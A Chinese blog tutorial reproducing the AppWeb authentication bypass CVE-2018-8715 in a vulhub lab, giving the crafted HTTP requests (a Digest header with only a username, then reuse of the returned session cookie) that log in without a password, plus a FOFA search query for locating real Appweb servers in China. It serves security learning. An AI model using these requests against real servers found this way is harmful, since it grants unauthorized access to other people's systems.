AppWeb认证绕过漏洞(CVE-2018-8715)复现

受影响版本:7.0.3之前的版本

Fofa语句搜索:
title=“Appweb” && country=“CN”
//没找到更好的,暂时凑合用
关注微信公众号:白安全组
获取更多详细资源
正文:
首先是运行靶场,这里使用的是vulhub靶场,启动的目录是

./appweb/CVE-2018-8715

启动命令:docker-compose up -d
关于vulhub靶场安装的方式可参考官网
https://vulhub.org/#/docs/
启动环境之后我们直接访问
http://192.168.0.110:8080/ //这里替换成你自己的靶机IP地址即可

我们首先要先知道一个用户名才行,靶场中的是admin
我们打开burp进行拦截,不需要输入密码,只输入用户名我们拦截
AppWeb认证绕过漏洞(CVE-2018-8715)复现_第1张图片AppWeb认证绕过漏洞(CVE-2018-8715)复现_第2张图片然后我们ctrl+r发送到重放器
AppWeb认证绕过漏洞(CVE-2018-8715)复现_第3张图片这个时候将左边的全部替换为下面的请求包

GET / HTTP/1.1 Host: example.com 
Accept-Encoding: gzip, deflate Accept: */* 
Accept-Language: en 
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) 
​Connection: close 
Authorization: Digest username=admin 

注:看图片中的格式,word中复制出的格式可能会有错,同时使用谷歌浏览器实验的话会有错,不太清楚原因,建议使用firefox
AppWeb认证绕过漏洞(CVE-2018-8715)复现_第4张图片然后我们点击发送之后右边就会出现一个session,我们复制出来

-http-session-=8::http.session::146407b75b2ead88014f60850246044f

然后我们进行下一步,利用我们获取到的cookie

POST / HTTP/1.1
Host: 192.168.0.110:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Authorization: Digest username=admin
 -http-session-=8::http.session::146407b75b2ead88014f60850246044f
Upgrade-Insecure-Requests: 1
Content-Length: 18

username=admin

将上面代码直接放到proxy中,将红色的地方改成你自己的IP和自己拿到的session
AppWeb认证绕过漏洞(CVE-2018-8715)复现_第5张图片然后我们直接发送
AppWeb认证绕过漏洞(CVE-2018-8715)复现_第6张图片
完成了,我们这里成功登录了进去,复现完成

参考文章:
https://blog.csdn.net/YouthBelief/article/details/121072956
https://vulhub.org/#/environments/appweb/CVE-2018-8715/

你可能感兴趣的:(笔记,安全,firefox,web安全,网络安全)